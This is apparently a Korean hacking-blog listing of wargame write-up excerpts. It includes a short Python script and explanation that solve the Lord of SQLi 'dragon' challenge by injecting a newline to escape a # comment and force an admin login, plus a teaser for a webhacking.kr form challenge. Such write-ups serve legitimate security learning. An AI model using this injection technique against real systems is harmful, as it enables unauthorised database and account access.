LOS :: 20번 DRAGON WRITE UP 12345678910import requests url = "http://los.rubiya.kr/dragon_51996aa769df79afbf79eb4d66dbcef6.php"session = {'PHPSESSID':'MY_SESSION'}data = {'pw':"\nand 0 or id='admin"} res = requests.get(url, params=data, cookies = session) if "Clear!" in res.text: print("[♪] DRAGON Clear!")Colored by Color Scriptercs Wargame/LOS(rubiya) 7년 전
[LOS]20번 dragon 귀여운 드래곤이 나를 반긴다 클릭해보자 음... id를 guest로 고정시켜놓고 뒤를 주석처리했다. 잠시 고민했다. 정말 잠시 그리고는 해결!! #은 한줄주석이기 때문에 이를 이용해서 %0a를 넣어주어 개행을 시켜주고 명령을 넣었다. 어렵지 않았던 문제였던것 같다. Wargame/LOS(eagle-jump) 8년 전
[Webhacking.kr]20번 20번 문제를 클릭하면 나오는 화면이다. 뭘 입력하라는건지 잘 모르겠으니 소스부터보자 음 길지만 그리 어렵지 않은것 같다 동물적 감각으로 function ck가 무슨일을 하는지 알아낼 수 있었다. lv5frm.id.value 이것이 화면상에 나타난 nickname일것이고 lv5frm.cmt.value 이것은 comment lv5frm.hack.value 이것은 code lv5frm.attackme.value 이게 code 옆에있는 의문의 문자이다. nickname과 comment와 code에는 값이 있어야 하고 code는 의문의 문자와 일치해야한다. 조건을 만족하도록 입력하여 submit을 누르자... 아무일도 일어나지 않았다. 뭐가 문제일까... 다시 메인화면으로 가보자 내가 놓친것은? time lim.. Wargame/webhacking.kr 8년 전
